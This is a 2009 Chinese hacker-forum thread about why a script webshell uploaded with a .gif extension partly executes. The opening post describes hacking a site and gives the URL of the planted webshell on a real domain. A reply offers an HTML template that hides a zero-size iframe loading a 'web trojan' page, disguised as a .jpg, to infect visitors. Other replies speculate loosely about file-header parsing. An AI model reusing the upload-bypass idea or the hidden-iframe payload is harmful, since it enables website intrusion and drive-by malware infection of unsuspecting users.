大家进来帮忙解释下。。。

4741 8
sunrise 2009-4-17 21:39:50 | 显示全部楼层 |阅读模式
今天帮朋友随便搞站,发现了一个问题.

就是,上传的后缀GIF的脚本小马能够执行部分代码.

这是地址

http://www.jkdoctor.com/bookpic/2009417213858436.gif

不知道你那里能不能看到,反正我这里是可以的.

图:

奇怪.jpg


知道原因的朋友麻烦解释下!

我好像在哪个英文资料上看过说有一个gip啥的后辍的文件好像有人在研究这东西可执行……有可能后辍我记错了。
8号坟墓 2009-4-18 02:58:19 | 显示全部楼层
这个大家都发现了,呵呵没什么稀奇的。至于什么原因我将不清楚,但是还有很多你看绝对路径的时候是些乱码,但是上传的时候也不能执行,仅仅是部分代码而已。比如连接啊什么的。
金鳞岂是池中之物?
sunrise 2009-4-18 14:47:28 | 显示全部楼层

回 2楼(8号坟墓) 的帖子

确实是。。。
hackunion 2009-4-18 18:00:53 | 显示全部楼层
两个例子,简单理解:
1、
<html>
<baby>
<iframe src=网马.htm width=0 height=0 frameborder=55>
</iframe>
<img src=图片.jpg>
</img>
</body>
网马.htm =》改你的网马地址,图片.jpg=》一张图片地址

把上面代码保存为 jpg的格式
这种放羊方法,大家都知道IE与系统解析执行网页代码。有人问为什么吗?没有。

2、
把一视频文件改了非视频后缀名,拖到拖放器上可以播放。有人问为什么吗?没有。

html文件开头为什么要<html>窗体为什么要<body>VC为什么要include调用头文件……

据传说有这么一个词“文件头分析识别”听过吧……
狂风伴凯歌,漫卷战旗红!
木子清腾 2009-4-18 22:31:06 | 显示全部楼层
哎 我有一段时间是没有学习了 有点……
正在学习……
codl 2009-4-18 22:36:49 | 显示全部楼层
不太懂
道,可道,非常道:名,可名,非常名:
极度深寒 2009-4-20 11:49:18 | 显示全部楼层
知道图片和文本可以压缩到一起,而且图片仍能显示,没有试过加入代码脚本压缩。
曾经冲动过,现在来交流。
oopww 2009-4-29 20:41:37 | 显示全部楼层
<htmL xmLnS:v>
<hEAd>
html开头的~~~~
不知道可以执行相应的脚本代码不?!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行